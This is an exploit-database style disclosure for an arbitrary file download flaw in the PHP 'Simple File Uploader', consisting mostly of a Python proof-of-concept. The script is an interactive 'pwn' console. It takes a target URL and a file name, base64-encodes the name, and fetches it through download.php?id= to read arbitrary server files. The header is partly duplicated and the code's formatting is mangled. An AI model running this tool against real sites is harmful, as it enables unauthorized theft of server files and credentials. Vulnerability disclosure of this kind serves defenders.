Simple File Uploader Arbitrary File Download

Details
Category: Vulnerabilities
Hits: 734
# Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https # Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo MouriA+-o, Rodrigo Avila, #RemoteExecution Team




POC

#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear')

BLUE = '33[94m'
RED = '33[91m'
GREEN = '33[32m'
CYAN = "33[96m"
WHITE = "33[97m"
YELLOW = "33[93m"
MAGENTA = "33[95m"
GREY = "33[90m"
DEFAULT = "33[0m"

def banner():
print WHITE+""
print " ## ## "
print " ## ## "
print " ############## "
print " #### ###### #### "
print " ###################### "
print " ## ############## ## "
print " ## ## ## ## "
print " #### ####"
print ""

def details():
print WHITE+" =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
print ""

def core_commands():
os.system('clear')
print WHITE+'''Core Commands ===============
Command Description ------- -----------
? Help menu
quit Exit the console
info Display information
download Exploit Vulnerability

'''

def about():
os.system('clear')
print WHITE+'''Simple File Uploader Download Tool v1.0.0 ===============
Author Description ------- -----------
Daniel Godoy https://www.exploit-db.com/author/?a=3146
'''

def download():
other = 'a'
while other != 'n':
urltarget = str(raw_input(WHITE+'Target: '))
filename = str(raw_input(WHITE+'FileName: '))
filename = base64.b64encode(filename)
print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
final = urltarget+'download.php?id='+filename
r = requests.get(final)
print r.text
other = str(raw_input(WHITE+'Test other file? y/n: '))
if other == "n":
print "Type quit to exit. Bye!"



banner()
details()

option='0'
while option != 0:
option = (raw_input(RED+"pwn" + WHITE +" > "))
if option == "quit":
os.system('clear')
option = 0
elif option == "?":
core_commands()
elif option == "help":
core_commands()
elif option == "about":
about()
elif option == "download":
download()
elif option == "info":
about()
else:
print "Not a valid option! Need help? Press ? to display core commands " +GREEN